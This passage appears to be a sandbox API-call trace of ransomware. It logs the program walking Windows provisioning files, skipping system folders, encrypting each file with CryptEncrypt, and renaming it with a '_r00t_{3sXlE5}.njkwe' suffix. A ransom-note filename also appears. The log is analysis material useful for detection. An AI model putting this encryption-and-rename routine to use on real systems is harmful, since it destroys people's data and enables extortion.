ftLastAccessTime.dwLowDateTime=0x90ecca53, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ecca53, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x348, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="406__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml", cAlternateFileName="406__C~1.PRO")) returned 1 [0079.108] lstrcmpiW (lpString1="406__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.108] lstrcmpiW (lpString1="406__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.108] lstrcmpiW (lpString1="406__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.108] lstrcmpiW (lpString1="406__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.108] lstrcmpiW (lpString1="406__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.108] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\406__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml") returned 158 [0079.108] StrStrIW (lpFirst="406__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.108] lstrcmpW (lpString1="406__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.108] lstrcmpW (lpString1="406__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.108] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\406__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.108] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\406__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\406__connections_cellular_orange (spain)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.109] GetTickCount () returned 0x1154199 [0079.109] GetTickCount () returned 0x1154199 [0079.109] GetTickCount () returned 0x1154199 [0079.109] GetTickCount () returned 0x1154199 [0079.109] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.109] GetProcessHeap () returned 0xbe0000 [0079.109] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.109] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x348, lpOverlapped=0x0) returned 1 [0079.111] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcb8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.111] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x348, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x348, lpOverlapped=0x0) returned 1 [0079.111] GetProcessHeap () returned 0xbe0000 [0079.111] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.111] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.111] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.111] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.111] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.111] CloseHandle (hObject=0x43c) returned 1 [0079.111] GetProcessHeap () returned 0xbe0000 [0079.112] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.112] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\406__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0079.112] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\406__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\406__connections_cellular_orange (spain)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\406__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\406__connections_cellular_orange (spain)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.112] GetProcessHeap () returned 0xbe0000 [0079.112] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.112] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ecca53, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ecca53, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ecca53, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2ca, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="407__Connections_Cellular_Telefonica (Spain)_i0$(__MVID)@WAP.provxml", cAlternateFileName="407__C~1.PRO")) returned 1 [0079.115] lstrcmpiW (lpString1="407__Connections_Cellular_Telefonica (Spain)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.115] lstrcmpiW (lpString1="407__Connections_Cellular_Telefonica (Spain)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.115] lstrcmpiW (lpString1="407__Connections_Cellular_Telefonica (Spain)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.115] lstrcmpiW (lpString1="407__Connections_Cellular_Telefonica (Spain)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.115] lstrcmpiW (lpString1="407__Connections_Cellular_Telefonica (Spain)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.115] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\407__Connections_Cellular_Telefonica (Spain)_i0$(__MVID)@WAP.provxml") returned 162 [0079.115] StrStrIW (lpFirst="407__Connections_Cellular_Telefonica (Spain)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.115] lstrcmpW (lpString1="407__Connections_Cellular_Telefonica (Spain)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.115] lstrcmpW (lpString1="407__Connections_Cellular_Telefonica (Spain)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.115] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\407__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.115] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\407__Connections_Cellular_Telefonica (Spain)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\407__connections_cellular_telefonica (spain)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.115] GetTickCount () returned 0x1154199 [0079.115] GetTickCount () returned 0x1154199 [0079.115] GetTickCount () returned 0x1154199 [0079.115] GetTickCount () returned 0x1154199 [0079.115] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.115] GetProcessHeap () returned 0xbe0000 [0079.115] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.115] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2ca, lpOverlapped=0x0) returned 1 [0079.117] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd36, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.117] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2ca, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2ca, lpOverlapped=0x0) returned 1 [0079.117] GetProcessHeap () returned 0xbe0000 [0079.117] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.117] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.117] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.117] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.117] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.118] CloseHandle (hObject=0x43c) returned 1 [0079.118] GetProcessHeap () returned 0xbe0000 [0079.118] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.118] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\407__Connections_Cellular_Telefonica (Spain)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0079.118] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\407__Connections_Cellular_Telefonica (Spain)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\407__connections_cellular_telefonica (spain)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\407__Connections_Cellular_Telefonica (Spain)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\407__connections_cellular_telefonica (spain)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.118] GetProcessHeap () returned 0xbe0000 [0079.118] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.119] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ef2cc3, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ef2cc3, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ef2cc3, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x356, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="408__Connections_Cellular_vodafone ES (Spain)_i0$(__MVID)@WAP.provxml", cAlternateFileName="408__C~1.PRO")) returned 1 [0079.119] lstrcmpiW (lpString1="408__Connections_Cellular_vodafone ES (Spain)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.119] lstrcmpiW (lpString1="408__Connections_Cellular_vodafone ES (Spain)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.119] lstrcmpiW (lpString1="408__Connections_Cellular_vodafone ES (Spain)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.119] lstrcmpiW (lpString1="408__Connections_Cellular_vodafone ES (Spain)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.119] lstrcmpiW (lpString1="408__Connections_Cellular_vodafone ES (Spain)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.119] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\408__Connections_Cellular_vodafone ES (Spain)_i0$(__MVID)@WAP.provxml") returned 163 [0079.119] StrStrIW (lpFirst="408__Connections_Cellular_vodafone ES (Spain)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.119] lstrcmpW (lpString1="408__Connections_Cellular_vodafone ES (Spain)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.119] lstrcmpW (lpString1="408__Connections_Cellular_vodafone ES (Spain)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.119] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\408__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.119] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\408__Connections_Cellular_vodafone ES (Spain)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\408__connections_cellular_vodafone es (spain)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.119] GetTickCount () returned 0x1154199 [0079.119] GetTickCount () returned 0x1154199 [0079.119] GetTickCount () returned 0x1154199 [0079.119] GetTickCount () returned 0x1154199 [0079.119] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.119] GetProcessHeap () returned 0xbe0000 [0079.119] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.119] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x356, lpOverlapped=0x0) returned 1 [0079.121] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcaa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.121] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x356, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x356, lpOverlapped=0x0) returned 1 [0079.121] GetProcessHeap () returned 0xbe0000 [0079.121] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.121] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.121] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.121] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.121] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.121] CloseHandle (hObject=0x43c) returned 1 [0079.122] GetProcessHeap () returned 0xbe0000 [0079.122] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.122] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\408__Connections_Cellular_vodafone ES (Spain)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0079.122] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\408__Connections_Cellular_vodafone ES (Spain)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\408__connections_cellular_vodafone es (spain)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\408__Connections_Cellular_vodafone ES (Spain)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\408__connections_cellular_vodafone es (spain)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.122] GetProcessHeap () returned 0xbe0000 [0079.122] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.122] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ef2cc3, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ef2cc3, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ef2cc3, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="409__Connections_Cellular_vodafone ES (Spain)_i1$(__MVID)@WAP.provxml", cAlternateFileName="409__C~1.PRO")) returned 1 [0079.122] lstrcmpiW (lpString1="409__Connections_Cellular_vodafone ES (Spain)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.122] lstrcmpiW (lpString1="409__Connections_Cellular_vodafone ES (Spain)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.122] lstrcmpiW (lpString1="409__Connections_Cellular_vodafone ES (Spain)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.122] lstrcmpiW (lpString1="409__Connections_Cellular_vodafone ES (Spain)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.122] lstrcmpiW (lpString1="409__Connections_Cellular_vodafone ES (Spain)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.122] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\409__Connections_Cellular_vodafone ES (Spain)_i1$(__MVID)@WAP.provxml") returned 163 [0079.122] StrStrIW (lpFirst="409__Connections_Cellular_vodafone ES (Spain)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.123] lstrcmpW (lpString1="409__Connections_Cellular_vodafone ES (Spain)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.123] lstrcmpW (lpString1="409__Connections_Cellular_vodafone ES (Spain)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.123] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\409__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.123] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\409__Connections_Cellular_vodafone ES (Spain)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\409__connections_cellular_vodafone es (spain)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.123] GetTickCount () returned 0x11541a9 [0079.123] GetTickCount () returned 0x11541a9 [0079.123] GetTickCount () returned 0x11541a9 [0079.123] GetTickCount () returned 0x11541a9 [0079.123] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.123] GetProcessHeap () returned 0xbe0000 [0079.123] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.123] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x352, lpOverlapped=0x0) returned 1 [0079.125] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.125] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x352, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x352, lpOverlapped=0x0) returned 1 [0079.125] GetProcessHeap () returned 0xbe0000 [0079.125] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.125] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.125] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.125] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.125] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.125] CloseHandle (hObject=0x43c) returned 1 [0079.125] GetProcessHeap () returned 0xbe0000 [0079.125] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.125] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\409__Connections_Cellular_vodafone ES (Spain)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0079.125] MoveFileW 